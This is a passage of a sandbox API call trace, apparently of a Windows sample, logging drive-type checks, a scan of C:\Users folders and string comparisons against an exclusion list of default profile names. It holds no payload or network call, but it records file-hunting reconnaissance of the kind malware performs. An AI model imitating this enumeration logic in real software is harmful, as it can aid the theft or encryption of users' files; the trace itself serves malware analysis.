(lpRootPathName="x:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0028.928] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.928] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.928] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0028.929] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.929] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0028.929] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.929] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.929] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.929] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0028.929] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.929] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="|", cchCount2=1) returned 3 [0028.930] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0028.930] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="*", cchCount2=1) returned 3 [0028.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="", cchCount2=0) returned 3 [0028.930] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.930] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x6ae738 | out: lpFindFileData=0x6ae738*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c1020, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7ed2a8 [0028.930] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae738 | out: lpFindFileData=0x6ae738*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c1020, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.930] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae738 | out: lpFindFileData=0x6ae738*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c1020, dwReserved1=0x777648, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.930] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x777648, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Default", cAlternateFileName="")) returned 1 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.931] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x10, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6aec18, dwReserved1=0x777648, cFileName="Public", cAlternateFileName="")) returned 1 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] FindNextFileW (in: hFindFile=0x7ed2a8, lpFindFileData=0x6ae720 | out: lpFindFileData=0x6ae720*(dwFileAttributes=0xc6009a, ftCreationTime.dwLowDateTime=0x36b0af, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xcc009b, nFileSizeHigh=0x36b0af, nFileSizeLow=0x8896d0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Pu\x08", cAlternateFileName="ᗐ{jဓĩ\x10")) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.932] FindClose (in: hFindFile=0x7ed2a8 | out: hFindFile=0x7ed2a8) returned 1 [0028.933] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.933] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.933] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="?", cchCount2=1) returned 1 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 